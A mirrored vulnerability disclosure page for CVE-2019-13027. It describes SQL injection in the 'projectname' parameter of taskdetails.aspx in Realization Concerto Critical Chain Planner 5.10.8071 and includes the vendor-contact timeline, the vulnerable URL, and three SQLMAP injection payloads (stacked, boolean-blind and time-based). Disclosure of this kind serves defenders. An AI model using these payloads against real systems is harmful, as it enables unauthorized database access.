Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-13027 PoC — Realization Concerto Critical Chain Planner SQL注入漏洞

Source
Associated Vulnerability
Title:Realization Concerto Critical Chain Planner SQL注入漏洞 (CVE-2019-13027)
Description:Realization Concerto Critical Chain Planner(CCPM)是一套项目管理软件。 Realization CCPM 5.10.8071版本中的taskupdt/taskdetails.aspx网页存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
Description
Details for disclosing CVE-2019-13027
Readme
# CVE-2019-13027
Details for disclosing CVE-2019-13027

Vendor contact timeline:
1st July 2019 -> No response, no email back.

4th July 2019 -> No response, no email back.

8th July 2019 -> Email sent, Github created.

11 July 2019 -> No Vendor response. Vuln disclosed.


> [Vulnerability Type]
> SQL Injection
> [Affected Product Code Base]
> CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Version: 5.10.8071 (Other versions on 5.x branch are probably affected. Cannot test with >other branchs)
> ------------------------------------------
> 
> [Affected Component]
> Realization Concerto Critical Chain Planner (aka CCPM) 5.10.8071 has some critical security Issues, being
> SQL Injection in at least in  taskupdt/taskdetails.aspx webpage via the "projectname" parameter
> 
> ------------------------------------------
> 
> [Attack Type]
> Remote
> 
> 
> [Attack Vectors]
> Application has a lot of reflected XSS/CSRF (for example, in checklist/checklist) , but the tricky part is the SQL Injections. Some tampering is needed depending on SQL Server versión and/or IDS/IPS. 
>
> 
>URL:
> https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
> 
> ProjectName (foo) must exist and be valid. Fuzz the rest of parameters (or use a real request).
>foo has also an XSS 
>
>Detected SQL (payloads From SQLMAP)
> Parameter: projectname (GET)
>   
> 
>     Type: stacked queries
>     Title: Microsoft SQL Server/Sybase stacked queries (comment)
>     Payload: projectname=foo';WAITFOR DELAY '0:0:5'--
> 
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: projectname=foo' AND 3676=3676-- 
>
>     Type: time-based blind
>     Title: Microsoft SQL Server/Sybase time-based blind (IF)
>     Payload: projectname=foo' WAITFOR DELAY '0:0:5'-- 
> 
>
> 
> 
> [Vendor of Product]
> REALIZATION - https://www.realization.com/
File Snapshot

[4.0K] /data/pocs/3908ad9007409809f16cec536c8ddf4ee0042b0b └── [1.9K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.